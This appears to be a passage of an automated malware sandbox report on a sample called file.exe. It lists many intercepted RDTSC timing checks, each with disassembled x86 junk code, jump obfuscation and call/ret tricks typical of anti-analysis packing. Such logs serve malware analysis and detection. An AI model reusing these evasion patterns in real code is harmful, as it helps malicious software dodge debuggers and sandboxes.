                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A466 second address: D2A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B3EF second address: D2B3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A67F second address: D2A683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A683 second address: D2A691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1674F90E1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B5F4 second address: D2B5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B5F8 second address: D2B60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F1674F90E18h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E431 second address: D2E435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E435 second address: D2E449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007F1674F90E16h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F5C8 second address: D2F5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D312B0 second address: D312B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3245B second address: D3245F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3341E second address: D33422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33422 second address: D3342C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3342C second address: D33432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33432 second address: D33436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33436 second address: D33451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33451 second address: D334BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F1675279DA8h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F1675279DA8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F1675279DA8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov ebx, 22909EE6h 0x0000004f push eax 0x00000050 push edi 0x00000051 pushad 0x00000052 jnc 00007F1675279DA6h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D314AD second address: D314B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31557 second address: D3155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D336AF second address: D336B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3557F second address: D35584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D376F6 second address: D3770C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1674F90E1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3770C second address: D37710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37710 second address: D37723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1674F90E1Bh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3794E second address: D37954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A851 second address: D3A855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38AB2 second address: D38AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A855 second address: D3A869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jbe 00007F1674F90E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F1674F90E18h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41D68 second address: D41D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41D70 second address: D41D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C714 second address: D4C744 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1675279DAAh 0x00000008 jmp 00007F1675279DB0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F1675279DAEh 0x00000016 jp 00007F1675279DA6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C744 second address: D4C74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B440 second address: D4B445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BA5D second address: D4BA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F1674F90E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BA6C second address: D4BA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BD03 second address: D4BD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1674F90E16h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007F1674F90E16h 0x00000016 popad 0x00000017 pushad 0x00000018 push edx 0x00000019 jmp 00007F1674F90E29h 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C3E1 second address: D4C409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1675279DB7h 0x0000000c jmp 00007F1675279DAAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C409 second address: D4C448 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F1674F90E16h 0x00000013 jnc 00007F1674F90E16h 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1674F90E1Ch 0x00000023 jmp 00007F1674F90E25h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C448 second address: D4C454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C454 second address: D4C458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F486 second address: D4F4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F1675279DBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE099E second address: CE09A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE09A8 second address: CE09AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54A4C second address: D54A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54A52 second address: D54A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54A57 second address: D54A68 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1674F90E1Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54A68 second address: D54A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5386F second address: D53874 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53874 second address: D5387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26208 second address: D0716C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F1674F90E18h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 cld 0x00000021 lea eax, dword ptr [ebp+12487FA0h] 0x00000027 xor dword ptr [ebp+12459526h], edx 0x0000002d nop 0x0000002e jc 00007F1674F90E2Fh 0x00000034 push eax 0x00000035 jmp 00007F1674F90E27h 0x0000003a pop eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push ecx 0x0000003e push esi 0x0000003f pop esi 0x00000040 pop ecx 0x00000041 pop eax 0x00000042 nop 0x00000043 mov dword ptr [ebp+1245224Fh], esi 0x00000049 call dword ptr [ebp+1244DF9Bh] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 pushad 0x00000055 popad 0x00000056 jne 00007F1674F90E16h 0x0000005c ja 00007F1674F90E16h 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 push esi 0x00000066 pop esi 0x00000067 jg 00007F1674F90E16h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26314 second address: D263DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 jmp 00007F1675279DB7h 0x0000000c pop edi 0x0000000d xchg eax, ebx 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F1675279DA8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007F1675279DB1h 0x0000002d xor edx, dword ptr [ebp+122D3702h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a jmp 00007F1675279DACh 0x0000003f js 00007F1675279DA6h 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c cld 0x0000004d mov dword ptr [ebp+12487FF8h], esp 0x00000053 mov ch, CCh 0x00000055 cmp dword ptr [ebp+122D366Ah], 00000000h 0x0000005c jne 00007F1675279E7Fh 0x00000062 adc dh, FFFFFFB9h 0x00000065 mov byte ptr [ebp+122D3214h], 00000047h 0x0000006c jl 00007F1675279DA8h 0x00000072 mov eax, D49AA7D2h 0x00000077 or edi, dword ptr [ebp+12458111h] 0x0000007d nop 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F1675279DB6h 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26ADD second address: D26AE7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26BD2 second address: D26BF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1675279DB7h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F1675279DA6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26BF9 second address: D26C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1674F90E28h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7412 second address: CE7416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7416 second address: CE745C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E29h 0x00000007 jmp 00007F1674F90E1Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F1674F90E2Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE745C second address: CE747E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1675279DACh 0x00000008 jne 00007F1675279DACh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53E2F second address: D53E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53E33 second address: D53E39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53E39 second address: D53E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F1674F90E1Eh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53E53 second address: D53E74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1675279DAEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DABh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5414F second address: D54166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007F1674F90E1Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F1674F90E16h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54596 second address: D5459B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D06D second address: D5D078 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D078 second address: D5D08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1675279DADh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D53E second address: D5D563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1674F90E16h 0x0000000a jmp 00007F1674F90E29h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9CD second address: D5D9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1675279DABh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DF1D second address: D5DF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DF26 second address: D5DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E589 second address: D5E59F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1674F90E16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d je 00007F1674F90E16h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E59F second address: D5E5A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5A6 second address: D5E5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1674F90E26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F1674F90E16h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5D0 second address: D5E5DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1675279DA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5DA second address: D5E5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F1674F90E16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F1674F90E16h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CD4C second address: D5CD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CD50 second address: D5CD5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CD5F second address: D5CD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F1675279DA6h 0x0000000f jmp 00007F1675279DADh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CD7B second address: D5CD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64364 second address: D64377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b ja 00007F1675279DA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63034 second address: D63038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63038 second address: D6303C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6303C second address: D63048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1674F90E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D632D1 second address: D632D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D632D5 second address: D632DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63630 second address: D63636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D667EE second address: D667F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D667F4 second address: D667FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D667FD second address: D66801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66801 second address: D66837 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F1675279DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F1675279DBDh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F1675279DA6h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66837 second address: D66841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66841 second address: D66847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
